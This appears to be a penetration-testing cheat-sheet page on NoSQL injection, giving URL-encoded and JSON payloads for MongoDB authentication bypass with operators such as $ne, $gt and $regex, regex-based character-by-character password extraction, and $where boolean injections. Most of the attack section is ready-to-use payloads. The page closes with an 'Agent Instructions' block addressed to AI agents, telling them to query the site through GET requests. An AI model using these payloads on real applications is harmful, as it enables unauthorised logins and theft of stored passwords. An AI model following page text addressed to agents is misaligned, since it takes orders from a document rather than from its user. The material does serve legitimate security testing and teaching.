# NoSQL Injection ## Theory NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. ## Practice #### Authentication Bypass {% tabs %} {% tab title="URL" %} Using not equal ($ne) or greater ($gt) we can try to bypass authentication ```bash username[$ne]=toto&password[$ne]=toto #Not Equal username[$regex]=.*&password[$regex]=.* #Regex username[$exists]=true&password[$exists]=true #If Exist username[$ne]=admin&password[$gt]=0 #Greater ``` {% endtab %} {% tab title="JSON" %} Using not equal ($ne) or greater ($gt) we can try to bypass authentication ```bash {"username": {"$ne": null}, "password": {"$ne": null} } #Not Equal {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } #Not Equal {"username": {"$gt": undefined}, "password": {"$gt": undefined} } #greater ``` {% endtab %} {% endtabs %} #### Extract data {% tabs %} {% tab title="URL" %} We can use regex to find the length of a value ```bash username[$regex]=.{25}&pass[$ne]=1 ``` We can use regex to extract information. ```bash username[$eq]=admin&password[$regex]=^p username[$eq]=admin&password[$regex]=^pa username[$eq]=admin&password[$regex]=^pas username[$ne]=toto&password[$regex]=^p username[$ne]=toto&password[$regex]=^pa username[$ne]=toto&password[$regex]=^pas ``` We can use `$nin` (not in) if you don't want to match with some values. ```bash # (not test and not admin) username[$nin][admin]=admin&username[$nin][test]=test&password[$regex]=^p ``` {% endtab %} {% tab title="JSON" %} We can use regex to find the length of a value ```bash {"username": {"$eq": "admin"}, "password": {"$regex": ".{25}" }} ``` We can use regex to extract information. ```bash {"username": {"$eq": "admin"}, "password": {"$regex": "^p" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^pa" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^pas" }} ``` We can use `$nin` (not in) if you don't want to match with some values. ```bash # (not test and not admin) {"username":{"$nin":["admin", "test"]}, "username":{"$regex": "^user" } ,"password":{"$ne":"1"}} ``` {% endtab %} {% endtabs %} #### MangoDB Injection {% tabs %} {% tab title="Payloads" %} You may try to make boolean based injection on MongoDB with following payloads ``` , $where: '1 == 1' $where: '1 == 1' ' || 1==1// ' || 1==1%00 ``` {% endtab %} {% endtabs %} ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/web-pentesting/web-vulnerabilities/server-side/nosql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.